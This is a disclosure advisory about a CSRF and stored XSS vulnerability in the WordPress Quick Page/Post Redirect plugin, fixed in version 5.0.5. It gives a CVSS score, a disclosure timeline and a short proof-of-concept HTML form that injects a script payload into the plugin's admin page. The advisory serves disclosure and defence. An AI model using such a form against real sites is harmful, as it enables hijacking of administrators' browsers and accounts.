Advisory:

CSRF and stored XSS in Quick Page/Post Redirect Plugin

Vulnerability

Last revised:

This plugin is vulnerable to a combination CSRF/XSS attack meaning that if an admin user can be persuaded to visit a URL of the attacker’s choosing (via spear phishing for instance), the attacker can insert arbitrary JavaScript into an admin page. Once that occurs the admin’s browser can be made to do almost anything the admin user could typically do such as create/delete posts, create new admin users, or even exploit vulnerabilities in other plugins.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score 6.8 Medium
Vector Network
Complexity Medium
Authentication None
Confidentiality Partial
Integrity Partial
Availability Partial
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Use the following form to introduce potentially malicious JavaScript:

<form method="POST" action="http://localhost/wp-admin/admin.php?page=redirect-updates">
  <input type="text" name="quickppr_redirects[request][]" value="&quot;>&lt;script>alert(1)&lt;/script>">
  <input type="text" name="quickppr_redirects[destination][]" value="http://dxw.com/">
  <Input type="text" name="submit_301" value="1">
  <input type="submit">
</form>

Advisory timeline

  • 2014-03-21: Discovered
  • 2014-03-24: Reported to plugins@wordpress.org
  • 2014-04-07: No response; requested an alternative email address using the author’s contact form.
  • 2014-04-08: Re-reported direct to author
  • 2014-04-08: Author responded, and publication agreed on or before 2014-05-06
  • 2014-04-10: Author reports issue fixed in version 5.0.5

Mitigation/further actions

Upgrade to version 5.0.5 or later.